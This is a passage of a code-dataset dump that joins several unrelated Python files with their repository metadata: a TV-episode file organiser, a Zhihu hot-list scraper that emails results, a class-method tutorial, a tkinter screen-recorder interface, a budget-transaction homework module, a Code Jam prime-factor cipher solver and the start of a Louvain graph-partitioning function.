if(item_list[0] == ''):\r\n item_list[0] = 'Frasier';\r\n\r\n if (int(item_list[1]) > 9):\r\n dest = os.path.join(show_folder, 
item_list[0], 'Season ' + item_list[1]);\r\n else:\r\n dest = os.path.join(show_folder, item_list[0], 'Season 0' + item_list[1]);\r\n\r\n #dest = os.path.abspath(dest);\r\n if('Sample' in dest):\r\n continue;\r\n\r\n print(dest)\r\n\r\n if not (os.path.exists(dest)):\r\n os.makedirs(dest);\r\n\r\n shutil.copy(src, dest);\r\n\r\n#returns a list that includes the name of the show and\r\n#the season number, returns None if it has no season number\r\n#i.e. if it isn't a show\r\ndef check_show_and_season(item, file_types):\r\n if(item.endswith(file_types)):\r\n item = item.title();\r\n title = clean_title(item);\r\n season = find_season(item);\r\n item_list = [];\r\n\r\n item_list.append(title);\r\n item_list.append(season);\r\n\r\n if(season is None or item_list[1] is None or item_list[1] is '' or item_list[1] is ' '):\r\n return None;\r\n else:\r\n return item_list;\r\n else:\r\n return None;\r\n\r\n#Finds what looks to be the season number and returns its value\r\ndef find_season(item):\r\n season = re.findall('S\\d\\d', item);\r\n if(season is None):\r\n season = re.findall('S\\d', item);\r\n\r\n if(season is None):\r\n season = re.findall('\\d\\d\\d\\d\\s', item);\r\n\r\n if('(' not in season and ')' not in season):\r\n season = str(season);\r\n total = '0';\r\n count = 0;\r\n for i in season:\r\n if(i.isdigit()):\r\n if(int(i) > 0 and count < 2):\r\n total += i;\r\n count += 1;\r\n return total;\r\n\r\n else:\r\n return None;\r\n else:\r\n season = str(season);\r\n total = '0';\r\n for i in season:\r\n if(i.isdigit()):\r\n if(int(i) > 0):\r\n total += i;\r\n\r\n return total;\r\n else:\r\n season = str(season);\r\n total = '';\r\n for i in season:\r\n if(i.isdigit()):\r\n if(int(i) > 0):\r\n total += i;\r\n\r\n return total;\r\n\r\n#Cleans all the rubbish from the title, like season number, periods, 'HDTV', 'XviD' etc.\r\ndef clean_title(item):\r\n item = item.title();\r\n if(\"'\" in item):\r\n item = item.replace(\"'\", '');\r\n item = item.title();\r\n if('.' in item):\r\n item = item.replace('.', ' ');\r\n if('_' in item):\r\n item = item.replace('_', ' ');\r\n if(' - ' in item):\r\n item = item.replace(' - ', ' ');\r\n if('-' in item):\r\n item = item.replace('-', ' ');\r\n if(' ' in item):\r\n item = item.replace(' ', ' ');\r\n if(' ' in item):\r\n item = item.replace(' ', ' ');\r\n if('(' in item):\r\n item = re.sub('(\\(.*)$', '', item);\r\n if('!' 
in item):\r\n item = item.replace('!', item);\r\n if(re.search('\\d-\\d', item)):\r\n item = re.sub('\\d-\\d', '', item);\r\n if(re.search('Season\\s\\d', item)):\r\n item = re.sub('Season\\s\\d(.*)$', '', item);\r\n if(re.search('S\\d\\d', item)):\r\n item = re.sub('S\\d\\d(.*)$', '', item);\r\n if(re.search('S\\d', item)):\r\n item = re.sub('S\\d(.*)$', '', item);\r\n if(re.search('Season', item)):\r\n item = re.sub('Season(.*)$', '', item);\r\n if(re.search('Sería', item)):\r\n item = re.sub('Sería(.*)$', '', item);\r\n if(re.search('Seria', item)):\r\n item = re.sub('Seria(.*)$', '', item);\r\n if(re.search('\\d\\sSería', item)):\r\n item = re.sub('\\d\\sSería(.*)$', '', item);\r\n if(re.search('Sería\\s\\d', item)):\r\n item = re.sub('Sería\\s\\d(.*)$', '', item);\r\n if(re.search('\\d\\sSeria', item)):\r\n item = re.sub('\\d\\sSeria(.*)$', '', item);\r\n if(re.search('Seria\\s\\d', item)):\r\n item = re.sub('Seria\\s\\d(.*)$', '', item);\r\n if(re.search('\\d\\dX\\d\\d', item)):\r\n item = re.sub('\\d\\dX\\d\\d(.*)$', '', item);\r\n if(re.search('\\d\\d\\d\\d', item)):\r\n item = re.sub('\\d\\d\\d\\d(.*)$', '', item);\r\n\r\n return item.strip();\r\n\r\n#Removes all the empty directories\r\ndef remove_empty_dirs(show_folder):\r\n for subdir, dirs, files in os.walk(show_folder):\r\n for d in dirs:\r\n if not(os.listdir(os.path.join(subdir, d))):\r\n os.removedirs(os.path.join(subdir, d));\r\n return;\r\n\r\ndef main():\r\n file_types = ('.mp4', '.avi', '.mkv', '.mov');\r\n\r\n download_folder, show_folder = sys.argv[1:];\r\n\r\n organize_directories(download_folder, show_folder, file_types);\r\n remove_empty_dirs(show_folder);\r\n return;\r\n\r\nif __name__ == '__main__':\r\n main();","repo_name":"OlafurAO/Python-Course","sub_path":"Forritunarmalid Python/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43465263627","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : Sy\n@File : hotlist.py\n@Time : 2020/8/16 3:22 下午\n@desc : 爬取知乎热榜,定时推送邮件\n\"\"\"\n\nimport requests\nfrom config.init_config import init_config, read_urls\nimport re\nfrom send_mails import SendMail\nimport time\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/84.0.4147.125 Safari/537.36 '\n}\n\n\ndef crawl_hot_list():\n \"\"\" 读取热榜,发送邮件 \"\"\"\n mail = SendMail()\n for url in read_urls():\n print(f'url:{url}')\n hot_list = []\n # url中带*,直接跳过,可以理解为注解\n if '*' in url:\n continue\n try:\n r = requests.get(url=url, headers=headers).json()\n # 如果是全站,url是total的标识,若不是,其余的是一样的解析\n data_list = r['data']\n for data in data_list:\n target = data['target']\n title = target['title'].encode(\"utf-8\").decode(\"utf-8\") # 标题\n # 问题地址,替换api和questions字段,得到真实地址\n old_url = target['url']\n if 'questions' not in old_url:\n continue\n url = old_url.replace('api', 'www').replace('questions', 'question')\n answer_count = target['answer_count'] # 回答数\n follower_count = target['follower_count'] # 关注数\n detail_text = data['detail_text'].encode(\"utf-8\").decode(\"utf-8\") # 热度\n result_dict = {\n 'title': title,\n 'url': url,\n 'answer_count': answer_count,\n 'follower_count': follower_count,\n 'detail_text': detail_text\n }\n hot_list.append(result_dict)\n except:\n import traceback\n traceback.print_exc()\n continue\n\n result_list = sort(hot_list) # 根据热度排序\n txt = deal_txt(result_list) # 处理文本\n mail.send_mails(txt) # 发邮件\n\n\ndef 
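Two slips in the clean.py snippet above are worth flagging: re.findall always returns a list (possibly empty), never None, so the `if(season is None)` fallbacks in find_season can never fire; and `item.replace('!', item)` substitutes the whole title for each '!' instead of deleting it (the fix is `item.replace('!', '')`). The cascade find_season appears to intend, sketched with emptiness tests:

import re

def find_season(item):
    # try the most specific pattern first; fall through on an empty match list
    for pattern in (r'S(\d\d)', r'S(\d)', r'(\d\d\d\d)\s'):
        matches = re.findall(pattern, item)
        if matches:
            return matches[0]
    return None

assert find_season('Frasier S04E12') == '04'
assert find_season('No season here') is None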
sort(list_hot):\n \"\"\" sorted 函数排序热度 \"\"\"\n list_hot = sorted(list_hot, key=sort_seed, reverse=True)\n return list_hot\n\n\ndef sort_seed(hot):\n \"\"\" sorted 函数用到的关键词种子,对 '万' 进行处理排序 \"\"\"\n r = re.findall(r'\\d*', hot['detail_text'])\n number = float(r[0])\n if '万' in hot['detail_text']:\n number *= 10000\n return number\n\n\ndef deal_txt(result_list):\n \"\"\" 数据转为文本 \"\"\"\n result_str_list = []\n for result_dict in result_list:\n title = result_dict['title']\n url = result_dict['url']\n answer_count = result_dict['answer_count']\n follower_count = result_dict['follower_count']\n detail_text = result_dict['detail_text']\n result_str = f\"标题: {title}\\n\" \\\n f\"网站地址: {url}\\n\" \\\n f\"回答人数: {answer_count}, \" \\\n f\"关注人数: {follower_count}, \" \\\n f\"热度: {detail_text}\\n\\n\"\n result_str_list.append(result_str)\n result = \"\\n\".join(result_str_list)\n return result\n\n\ndef main():\n begin = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n print(f\"{begin}----脚本开始----\")\n init_config()\n crawl_hot_list() # 爬取数据\n end = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n print(f\"{end}----脚本结束----\")\n\n\nmain()\n","repo_name":"unlimitbladeworks/python-tools","sub_path":"automation/zhihu-email/hotlist.py","file_name":"hotlist.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"61"} +{"seq_id":"32473627851","text":"class Dog:\n dogs = [] # specific to entire dog class\n\n def __init__(self, name):\n self.name = name\n self.dogs.append(self)\n\n @classmethod # decorator specify a class method\n def num_dogs(cls): # cls means name of the class\n return len(cls.dogs)\n\n @staticmethod\n def bark(n):\n \"\"\"barks n time\"\"\"\n for n in range(n):\n print(\"Bark!\")\n\n\ntim = Dog(\"Tim\")\njim = Dog(\"Jim\")\nprint(Dog.num_dogs()) # calling a class method\n","repo_name":"sheucke/Pythontutorial","sub_path":"staticMethodsClasses.py","file_name":"staticMethodsClasses.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2243154868","text":"#Run main.py!!!\n\nimport tkinter\nfrom tkinter import *\n\ndef on_closing():\n global running\n running = False\n\n# GUI\nroot = tkinter.Tk()\nroot.protocol(\"WM_DELETE_WINDOW\", on_closing)\nroot.resizable(False, False)\nroot.title(\"Screen Recorder\")\nroot.geometry(\"800x400+500+100\")\ncanvas = Canvas(root, bg=\"#4392F1\", height=400, width=800, bd=0, highlightthickness=0, relief=\"ridge\")\ncanvas.place(x=0, y=0)\nbackground_img = PhotoImage(file=f\"imp_images/final1.png\")\nbackground = canvas.create_image(400.0, 200.0, image=background_img)\nheader = canvas.create_text(400.0, 91.0, text=\"Capture Your screen\", fill=\"#ECE8EF\", font=(\"Roboto-Bold\", int(30.0)))\ncreate_label = canvas.create_text(203.5, 174.5, text=\"create an\", fill=\"#EDFF00\", font=(\"Roboto-Bold\", int(16.0)))\nvideo_label = canvas.create_text(590.5, 174.5, text=\" (15 recom.)fps video\", fill=\"#030303\", font=(\"Roboto-Medium\", int(16.0)))\nswitch = tkinter.Scale(from_=1, to=100, orient=tkinter.HORIZONTAL, length=200, activebackground=\"#000000\"\n , bg=\"#FFC0CB\", highlightcolor=\"#C25993\", highlightbackground=\"#C25993\", fg=\"black\",\n troughcolor=\"white\")\n\nmenubar = Menu(root)\nvideo = Menu(menubar, tearoff=0)\nabout = Menu(menubar, tearoff=0)\nvideo_format = Menu(menubar, tearoff=0)#C25993\n\n\nmp4_format = 
tkinter.BooleanVar()\nmp4_format.set(True)\navi_format = tkinter.BooleanVar()\n\nvideo.add_cascade(label='Video Format', menu=video_format)\n\nmenubar.add_cascade(label='File', menu=video)\nmenubar.add_cascade(label=\"About\", menu=about)\n\nstart_img = PhotoImage(file=f\"imp_images/start.png\")\nstart = Button(image=start_img, borderwidth=0, highlightthickness=0, relief=\"sunken\")\npause_img = PhotoImage(file=f\"imp_images/pause.png\")\npause = Button(image=pause_img, borderwidth=0, highlightthickness=0, relief=\"sunken\")\nend_img = PhotoImage(file=f\"imp_images/end.png\")\nend = Button(image=end_img, borderwidth=0, highlightthickness=0, relief=\"sunken\")\ninfo = canvas.create_text(400.0, 342.5, text=\"Start Recording\", fill=\"#0f0f0f\", font=(\"Roboto-Medium\", int(16.0)))\n\n# When started\n#start[\"state\"] = \"normal\"\nend[\"state\"] = \"normal\"\npause[\"state\"] = \"normal\"\n","repo_name":"Shubham-bit-hash/project-1-screen-recorder-python","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71357058114","text":"\"\"\"\r\n Program functionalities module\r\n\"\"\"\r\n\r\n\r\ndef creat_transaction(day, amount, typ, description):\r\n return [day, amount, typ, description]\r\n\r\n\r\ndef set_transaction(transactions, day, amount, typ, description):\r\n trans = creat_transaction(day, amount, typ, description)\r\n transactions. append(trans)\r\n\r\n\r\ndef auto_set_transaction(transactions):\r\n \"\"\"\r\n Setting 10 initial transactions in the list\r\n :param transactions:\r\n \"\"\"\r\n set_transaction(transactions, 1, 115, 'in', 'salary')\r\n set_transaction(transactions, 3, 16, 'out', 'food')\r\n set_transaction(transactions, 7, 8, 'in', 'economy')\r\n set_transaction(transactions, 10, 2, 'out', 'cat food')\r\n set_transaction(transactions, 16, 5, 'in', 'economy')\r\n set_transaction(transactions, 20, 21, 'in', 'food')\r\n set_transaction(transactions, 20, 10, 'out', 'party')\r\n set_transaction(transactions, 20, 8, 'out', 'vet')\r\n set_transaction(transactions, 20, 13, 'out', 'vet')\r\n set_transaction(transactions, 30, 115, 'in', 'salary')\r\n\r\n\r\ndef get_day(transactions, i):\r\n return transactions[i][0]\r\n\r\n\r\ndef get_value(transactions, i):\r\n return transactions[i][1]\r\n\r\n\r\ndef get_type(transactions, i):\r\n return transactions[i][2]\r\n\r\n\r\ndef get_description(transactions, i):\r\n return transactions[i][3]\r\n\r\n\r\ndef nr(aux):\r\n i = 0\r\n while i != len(aux) and aux[i] != ' ':\r\n if aux[i] < '0' or aux[i] > '9':\r\n return 0\r\n i = i + 1\r\n return 1\r\n\r\n\r\ndef option_error(option):\r\n y = option.split()\r\n error = 0\r\n if y[0] == 'add' or y[0] == 'insert':\r\n if y[0] == 'add' and len(y) != 4:\r\n error = 1\r\n elif y[0] == 'insert' and len(y) != 5:\r\n error = 1\r\n if error == 0:\r\n if nr(y[1]) == 0:\r\n error = 1\r\n elif y[0] == 'insert' and nr(y[2]) == 0:\r\n error = 1\r\n elif find_type(y[3]) == '-' and find_type(y[2]) == '-':\r\n error = 1\r\n elif y[0] == 'remove':\r\n if len(y) == 1:\r\n error = 1\r\n if error == 0:\r\n if len(y) == 4:\r\n if y[2] != 'to' or nr(y[3]) == 0:\r\n error = 1\r\n if nr(y[1]) == 0 and find_type(y[1]) == '-':\r\n error = 1\r\n elif y[0] == 'replace':\r\n if len(y) != 6:\r\n error = 1\r\n if error == 0:\r\n if nr(y[1]) == 0 or nr(y[5]) == 0:\r\n error = 1\r\n if find_type(y[2]) == '-':\r\n error = 1\r\n if y[4] != 'with':\r\n error = 1\r\n elif y[0] == 
'list':\r\n if len(y) != 1:\r\n if len(y) == 2:\r\n if find_type(y[1]) == '-':\r\n error = 1\r\n elif len(y[1]) == 1:\r\n if y[1] != '=' and y[1] != '<' and y[1] != '>':\r\n error = 1\r\n if nr(y[2]) == 0:\r\n error = 1\r\n elif y[1] != 'balance' or nr(y[2]) == 0:\r\n error = 1\r\n elif y[0] == 'sum':\r\n if len(y) != 2:\r\n error = 1\r\n elif find_type(y[1]) == '-':\r\n error = 1\r\n elif y[0] == 'max' or y[0] == 'filter':\r\n if len(y) != 3:\r\n error = 1\r\n elif find_type(y[1]) == '-' or nr(y[2]) == 0:\r\n error = 1\r\n if y[0] == 'filter' and len(y) == 2 and find_type(y[1]) != '-':\r\n error = 0\r\n return error\r\n\r\n\r\ndef tests():\r\n assert elim_space(' ana are mere ') == 'ana are mere'\r\n assert creat_transaction(2, 3, 'in', 'pizza') == [2, 3, 'in', 'pizza']\r\n assert elim_cuv('text de 24') == 'de 24'\r\n assert take_word('text de 24') == 'text'\r\n assert elim_space(' text of 23 ') == 'text of 23'\r\n assert find_type('in mag') == 'in'\r\n t = [[2, 3, 'in', 'pizza'], [4, 3, 'in', 'pizza']]\r\n elim_transaction(t, 0)\r\n assert t == [[4, 3, 'in', 'pizza']]\r\n add_trans(t, 'insert 12 13 in pizza')\r\n assert t == [[4, 3, 'in', 'pizza'], [12, 13, 'in', 'pizza']]\r\n elim_trans_days(t, 4, 5)\r\n assert t == [[12, 13, 'in', 'pizza']]\r\n add_trans(t, 'insert 22 13 out pizza')\r\n elim_trans_type(t, 'out')\r\n assert t == [[12, 13, 'in', 'pizza']]\r\n add_trans(t, 'insert 22 13 out pizza')\r\n add_trans(t, 'add 5 in pizza')\r\n assert balance_day(t, 30) == 5\r\n assert sum_in(t, 'in') == 18\r\n add_trans(t, 'add 15 in pizza')\r\n assert maxi(t, 'in', 29) == 3\r\n filteri(t, 'filter in')\r\n assert t == [[12, 13, 'in', 'pizza'], [29, 5, 'in', 'pizza'], [29, 15, 'in', 'pizza']]\r\n op = ['add 5 in pizza']\r\n undo_add(op, t)\r\n assert t == [[12, 13, 'in', 'pizza'], [29, 15, 'in', 'pizza']]\r\n\r\n\r\ndef elim_cuv(list):\r\n \"\"\"\r\n The program eliminates the first word from the text\r\n :param list: the text\r\n :return: the text without the first word\r\n \"\"\"\r\n spatiu = 0\r\n i = 0\r\n while spatiu != 1:\r\n if list[i] == ' ':\r\n spatiu = spatiu + 1\r\n i = i + 1\r\n list = list[i:]\r\n return list\r\n\r\n\r\ndef take_word(list):\r\n \"\"\"\r\n the function returns the description of the transaction\r\n :param list: the text\r\n :return: the description\r\n \"\"\"\r\n i = 0\r\n n = len(list)\r\n while i < n and list[i] != ' ':\r\n i = i + 1\r\n list = list[:i]\r\n return list\r\n\r\n\r\ndef elim_space(text):\r\n \"\"\"\r\n the function eliminates the unnecessary spaces of the option\r\n \"\"\"\r\n while text[0] == ' ':\r\n text = text[1:]\r\n i = 1\r\n n = len(text)\r\n while i < n:\r\n if text[i] == ' ' and text[i-1] == ' ':\r\n c = text[0:i]\r\n b = text[i+1:]\r\n text = c + b\r\n n = n - 1\r\n else:\r\n i = i + 1\r\n if text[-1] == ' ':\r\n text = text[:-1]\r\n return text\r\n\r\n\r\ndef insert(transactions, i):\r\n \"\"\"\r\n The function is used for inserting transactions, so when we display the transactions they are ordered considering\r\n the 'day' as the main criteria.\r\n \"\"\"\r\n day = get_day(transactions, -1)\r\n j = -1\r\n if i < day:\r\n # we memorise the items of the last transaction\r\n value = get_value(transactions, -1)\r\n typ = get_type(transactions, -1)\r\n desc = get_description(transactions, -1)\r\n set_transaction(transactions, day, value, typ, desc)\r\n while i < day:\r\n transactions[j] = transactions[j-1]\r\n j = j - 1\r\n day = get_day(transactions, j)\r\n else:\r\n set_transaction(transactions, 0, 0, '0', '0')\r\n return -1\r\n return j + 
1\r\n\r\n\r\ndef find_type(list):\r\n \"\"\"\r\n the function returns the type of the transaction if there is one\r\n :param list: the text\r\n :return: type\r\n \"\"\"\r\n cuv = take_word(list)\r\n if cuv == 'out':\r\n t = 'out'\r\n elif cuv == 'in':\r\n t = 'in'\r\n else:\r\n t = '-'\r\n return t\r\n\r\n\r\ndef add_trans(transactions, option):\r\n \"\"\"\r\n the function adds a new transaction according to the text that was read. it also separates the parts of the text\r\n that are crucial to understanding the transaction.\r\n :param transactions: the transactions that already exist\r\n :param option: the text inputted\r\n \"\"\"\r\n y = option.split()\r\n if y[0] == 'add':\r\n day = 29\r\n value = int(y[1])\r\n typ = y[2]\r\n description = y[3]\r\n else:\r\n day = int(y[1])\r\n value = int(y[2])\r\n typ = y[3]\r\n description = y[4]\r\n poz = insert(transactions, day)\r\n transactions[poz] = creat_transaction(day, value, typ, description)\r\n\r\n\r\ndef elim_transaction(transactions, index):\r\n \"\"\"the function eliminates the transaction with index == index\"\"\"\r\n del transactions[index]\r\n\r\n\r\ndef elim_trans_days(transactions, day1, day2):\r\n \"\"\"\r\n the function eliminates the transactions between the inputted days\r\n :param transactions: the transactions\r\n :param day1: the first day\r\n :param day2: the last day\r\n \"\"\"\r\n n = len(transactions)\r\n elim = 0\r\n i = 0\r\n while i < n-elim:\r\n day = get_day(transactions, i)\r\n if day1 <= day <= day2:\r\n elim_transaction(transactions, i)\r\n elim = elim + 1\r\n else:\r\n i = i + 1\r\n\r\n\r\ndef elim_trans_type(transactions, typ):\r\n \"\"\"\r\n the function eliminates the transactions that have the same type as the one inputted\r\n :param transactions: the transactions\r\n :param typ: the inputted type\r\n \"\"\"\r\n n = len(transactions)\r\n elim = 0\r\n i = 0\r\n while i < n - elim:\r\n ty = get_type(transactions, i)\r\n if ty == typ:\r\n elim_transaction(transactions, i)\r\n elim = elim + 1\r\n else:\r\n i = i + 1\r\n\r\n\r\ndef replace(transactions, day, typ, description, value):\r\n \"\"\"\r\n the function replaces the transactions that meet the requirements inputted\r\n :param transactions: the transactions\r\n :param day: the inputted day\r\n :param typ: the inputted type\r\n :param description: the inputted description\r\n :param value: the value with which the transaction is goind to be replaced\r\n \"\"\"\r\n n = len(transactions)\r\n i = 0\r\n while i < n:\r\n dy = get_day(transactions, i)\r\n ty = get_type(transactions, i)\r\n desc = get_description(transactions, i)\r\n if dy == day and ty == typ and desc == description:\r\n transactions[i][1] = value\r\n i = i + 1\r\n\r\n\r\ndef modify(transactions, option):\r\n \"\"\"\r\n the function is the main body for the second option\r\n :param transactions: the transactions\r\n :param option: the text\r\n \"\"\"\r\n y = option.split()\r\n if y[0] == 'remove':\r\n day1 = nr(y[1])\r\n if day1 != 0:\r\n day1 = int(y[1])\r\n if len(y) > 2:\r\n day2 = int(y[3])\r\n else:\r\n day2 = day1\r\n elim_trans_days(transactions, day1, day2)\r\n else:\r\n typ = y[1]\r\n elim_trans_type(transactions, typ)\r\n elif y[0] == 'replace':\r\n day = int(y[1])\r\n typ = y[2]\r\n desc = y[3]\r\n value = int(y[5])\r\n replace(transactions, day, typ, desc, value)\r\n\r\n\r\ndef balance_day(transactions, day):\r\n \"\"\"\r\n the function calculates the amount of money spent and saved till an inputted day\r\n :param transactions: the transactions\r\n :param day: the given day\r\n 
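The insert helper earlier in functions.py keeps transactions ordered by day through manual element shifting; the standard-library bisect module expresses the same invariant more directly (a sketch assuming each transaction is a [day, amount, type, description] list, as in this file):

import bisect

def insert_sorted(transactions, trans):
    days = [t[0] for t in transactions]        # extract the sort key
    pos = bisect.bisect_right(days, trans[0])  # first slot after equal days
    transactions.insert(pos, trans)

log = [[1, 115, 'in', 'salary'], [7, 8, 'in', 'economy']]
insert_sorted(log, [3, 16, 'out', 'food'])
assert [t[0] for t in log] == [1, 3, 7]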
\"\"\"\r\n n = len(transactions)\r\n sum = 0\r\n i = 0\r\n while i < n:\r\n dy = get_day(transactions, i)\r\n if dy <= day:\r\n typ = get_type(transactions, i)\r\n if typ == 'in':\r\n sum = sum + get_value(transactions, i)\r\n else:\r\n sum = sum - get_value(transactions, i)\r\n i = i + 1\r\n return sum\r\n\r\n\r\ndef sum_in(transactions, typ):\r\n \"\"\"\r\n the function calculates the amount of money spent and saved till an inputted day\r\n :param transactions: the transactions\r\n \"\"\"\r\n n = len(transactions)\r\n sum = 0\r\n i = 0\r\n while i < n:\r\n type1 = get_type(transactions, i)\r\n if typ == type1:\r\n sum = sum + get_value(transactions, i)\r\n i = i + 1\r\n return sum\r\n\r\n\r\ndef maxi(transactions, typ, day):\r\n \"\"\"\r\n the function determines the maximum transaction that meets the requirements\r\n :param transactions: the transactions\r\n :param typ: the type\r\n :param day: the day\r\n :return: the position of the transaction\r\n \"\"\"\r\n poz = -1\r\n n = len(transactions)\r\n max = 0\r\n for i in range(0, n):\r\n if get_day(transactions, i) == day:\r\n if get_type(transactions,i) == typ:\r\n v = get_value(transactions, i)\r\n if max < v:\r\n max = v\r\n poz = i\r\n return poz\r\n\r\n\r\ndef filteri(transactions, option):\r\n \"\"\"\r\n the program filters the transactions\r\n :param transactions: the transactions\r\n :param option: the option\r\n \"\"\"\r\n y = option.split()\r\n n = len(transactions)\r\n i = 0\r\n while i < n:\r\n if len(y) == 3:\r\n if get_value(transactions, i) > int(y[2]):\r\n elim_transaction(transactions, i)\r\n n = n - 1\r\n else:\r\n i = i + 1\r\n else:\r\n if get_type(transactions, i) != y[1]:\r\n elim_transaction(transactions, i)\r\n n = n - 1\r\n else:\r\n i = i + 1\r\n\r\n\r\ndef undo_add(options, transactions):\r\n \"\"\"\r\n the function undo the adding operations\r\n \"\"\"\r\n y = options[-1].split()\r\n if y[0] == 'add':\r\n day = 29\r\n value = int(y[1])\r\n typ = y[2]\r\n desc = y[3]\r\n else:\r\n day = int(y[1])\r\n value = int(y[2])\r\n typ = y[3]\r\n desc = y[4]\r\n n = len(transactions)\r\n i = 0\r\n while i < n:\r\n if get_day(transactions, i) == int(day):\r\n if get_value(transactions, i) == value:\r\n if get_type(transactions, i) == typ and get_description(transactions, i) == desc:\r\n elim_transaction(transactions, i)\r\n break\r\n i = i + 1\r\n return transactions\r\n\r\n\r\ndef undo(options, transactions, eliminate):\r\n \"\"\"\r\n the function is the main body for the undo operation\r\n :param options: the option\r\n :param transactions: the transactions\r\n :param eliminate: the modified lists\r\n \"\"\"\r\n if len(options) == 0:\r\n print('there are no more options to undo')\r\n else:\r\n y = options[-1].split()\r\n if y[0] == 'add' or y[0] == 'insert':\r\n transactions = undo_add(options, transactions)\r\n elif y[0] == 'remove' or y[0] == 'replace' or y[0] == 'filter':\r\n transactions = eliminate[-1].copy()\r\n del eliminate[-1]\r\n del options[-1]\r\n return transactions\r\n","repo_name":"914-Claudia-Moisiuc/Faculty-Python","sub_path":"a4-914-Claudia-Moisiuc/src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":13818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12959880835","text":"import math\nimport statistics \n\ndef crack(nl, cipher):\n n,l = [int(i) for i in nl.split(\" \")]\n nums = map(lambda i: int(i), cipher.split(\" \"))\n all_prime_factors = set()\n options = []\n firstfactors = None\n i = 0\n for num in 
nums:\n factors = prime_factors(num)\n lfactors = list(factors)\n if firstfactors is None:\n firstfactors = lfactors\n if i > 0:\n if len(lfactors) == 1:\n # options = [lfactors]\n options[i-1] = lfactors\n else:\n options[i-1] += lfactors\n options.append(list(lfactors))\n i+=1\n all_prime_factors = all_prime_factors | factors\n options = [firstfactors] + options\n\n ## build alphabet\n ordered = list(all_prime_factors)\n ordered.sort()\n\n letter = ord('A')\n alphabet = {}\n for prime in ordered:\n alphabet[prime] = chr(letter)\n letter += 1\n\n while not_done(options):\n idx = -1\n\n for option in options:\n idx += 1\n if len(option) == 1:\n continue\n\n foundOne = False\n for o in option:\n unique = True\n if idx-1 >= 0:\n left = options[idx-1]\n if o in left:\n unique = False\n if idx+1 < len(options):\n right = options[idx+1]\n if o in right:\n unique = False\n if unique:\n options[idx] = [o]\n foundOne = True\n break\n if foundOne:\n continue\n\n try:\n m = statistics.mode(option)\n except statistics.StatisticsError:\n ## nothing to do\n continue\n\n if idx-1 >= 0:\n if m in options[idx-1] and len(options[idx-1]) > 1:\n options[idx-1].remove(m)\n\n if idx+1 < len(options):\n if m in options[idx+1] and len(options[idx+1]) > 1:\n options[idx+1].remove(m)\n\n options[idx] = [m]\n\n result = \"\"\n for num in options:\n result += alphabet[num[0]]\n return result\n\n\ndef not_done(options):\n for o in options:\n if len(o) > 1:\n return True\n return False\n\n\n# thanks https://www.geeksforgeeks.org/print-all-prime-factors-of-a-given-number/\ndef prime_factors(n):\n results = set()\n while n % 2 == 0: \n results.add(2)\n n = n / 2\n \n # n must be odd at this point \n # so a skip of 2 ( i = i + 2) can be used \n for i in range(3,int(math.sqrt(n))+1,2): \n while n % i== 0: \n results.add(i)\n n = int(n / i)\n \n # Condition if n is a prime \n # number greater than 2 \n if n > 2: \n results.add(int(n))\n\n return results\n\n\nif __name__ == \"__main__\":\n num_cases = int(input())\n case_num = 1\n while case_num <= num_cases:\n nl = input()\n cipher = input()\n clear = crack(nl, cipher)\n print(\"Case #{}: {}\".format(case_num, clear))\n case_num += 1","repo_name":"MustafaHaddara/google-code-jam-2019","sub_path":"qual/03-crypto.py","file_name":"03-crypto.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32599102907","text":"import torch\nfrom config import args\nfrom datasets.louvain.community import community_louvain\nfrom sklearn.cluster import spectral_clustering\n\n\ndef structure_iid_louvain(graph,num_clients):\n num_nodes = graph.number_of_nodes() \n partition = community_louvain.best_partition(graph)\n groups = []\n for key in partition.keys():\n if partition[key] not in groups:\n groups.append(partition[key])\n partition_groups = {group_i: [] for group_i in groups}\n for key in partition.keys():\n partition_groups[partition[key]].append(key)\n group_len_max = num_nodes // num_clients\n for group_i in groups:\n while len(partition_groups[group_i]) > group_len_max:\n long_group = list.copy(partition_groups[group_i])\n partition_groups[group_i] = list.copy(long_group[:group_len_max])\n new_grp_i = max(groups) + 1\n groups.append(new_grp_i)\n partition_groups[new_grp_i] = long_group[group_len_max:]\n len_list = []\n for group_i in groups:\n len_list.append(len(partition_groups[group_i]))\n len_dict = {}\n for i in range(len(groups)):\n len_dict[groups[i]] = len_list[i]\n 
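structure_iid_louvain above first splits any Louvain community larger than num_nodes // num_clients, and the assignment that follows hands groups to clients largest-first so every shard stays near that quota. The balancing idea, reduced to a self-contained greedy sketch:

def pack_groups(groups, num_bins):
    # largest community first, always into the currently emptiest bin
    bins = [[] for _ in range(num_bins)]
    for group in sorted(groups, key=len, reverse=True):
        min(bins, key=len).extend(group)
    return bins

shards = pack_groups([[1, 2, 3], [4, 5], [6], [7, 8, 9, 10]], num_bins=2)
assert sorted(len(s) for s in shards) == [5, 5]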
